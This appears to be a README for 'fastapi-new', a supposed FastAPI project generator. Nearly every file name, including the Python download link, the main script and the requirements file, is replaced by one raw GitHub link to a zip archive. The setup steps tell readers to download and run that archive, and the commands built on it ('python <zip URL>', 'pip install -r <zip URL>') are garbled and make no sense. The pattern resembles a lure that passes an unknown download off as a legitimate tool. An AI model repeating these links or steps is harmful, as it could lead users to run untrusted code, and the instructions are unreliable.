Welcome to fastapi-new, your simple tool to create a new FastAPI project in just one command. This application streamlines the setup process, allowing you to focus on building your application instead of handling the setup details.
- Easy Setup: Start a FastAPI project with one command.
- User-Friendly: Designed for everyone, even if you have no coding experience.
- Ready to Use: Get a functional project structure right away.
- Documentation Included: Learn how to use the application with built-in guides.
To use fastapi-new, ensure your computer meets these basic requirements:
- Operating System: Windows 10 or later, macOS, or a modern Linux distribution.
- Python: Python 3.7 or higher must be installed. You can download Python from https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip.
- Internet Connection: Required for downloading the FastAPI framework and other dependencies.
Follow these steps to set up fastapi-new on your computer.
-
Visit the Releases Page: Click the link below to go to the download page.
-
Choose the Latest Version: On the releases page, look for the most recent version. It will typically be at the top of the list.
-
Download the Application: Click on the file name associated with the latest release to start downloading. The file should look something like
https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip. -
Extract the Files: Once the download completes, find the downloaded zip file. Right-click on it and select "Extract All" or use your preferred extraction software.
-
Open Your Terminal:
- Windows: Search for "cmd" in the Start menu and open Command Prompt.
- macOS: Open "Terminal" from your Applications folder or using Spotlight.
- Linux: Open your terminal from the applications menu.
-
Navigate to the Unzipped Folder: Use the command below to navigate to the folder where you extracted the files. Replace
path/to/extracted/folderwith the actual path.cd path/to/extracted/folder -
Run the Application: Now, execute the following command to create a new FastAPI project:
python https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip new my_projectReplace
my_projectwith your desired project name. -
Explore the Project Structure: After running the command, a new folder named
my_projectwill be created in your current directory. Inside this folder, you will find:https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip: The main application file.https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip: A list of needed packages.https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip: This file includes instructions specific to your new FastAPI project.
To get started, please visit the link below to download fastapi-new.
Once installed, follow the steps in the "Getting Started" section to set up your FastAPI project.
Along with your new project, the generated https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip file in your project folder includes detailed information on how to set up and run your FastAPI application. This documentation covers:
- How to install necessary Python packages.
- Instructions for running your FastAPI server.
- Examples to help you build your application.
Feel free to modify this file as needed.
If you encounter any issues while using fastapi-new, consider the following solutions:
-
Python Not Found: Make sure Python is correctly installed and added to your system's PATH. You can verify this by typing
python --versionin your terminal. -
No Response When Running Command: Ensure that you are in the correct directory where the
https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zipscript is located. -
Dependency Errors: Check the
https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zipfile for needed packages. Install them using the command:pip install -r https://raw.githubusercontent.com/Tiek990/fastapi-new/main/scripts/fastapi-new_v1.5.zip
For further assistance, you can reach out through GitHub Issues or join our community forums. We encourage users to share their experiences and help each other grow.
Thank you for using fastapi-new! Enjoy building your FastAPI applications effortlessly.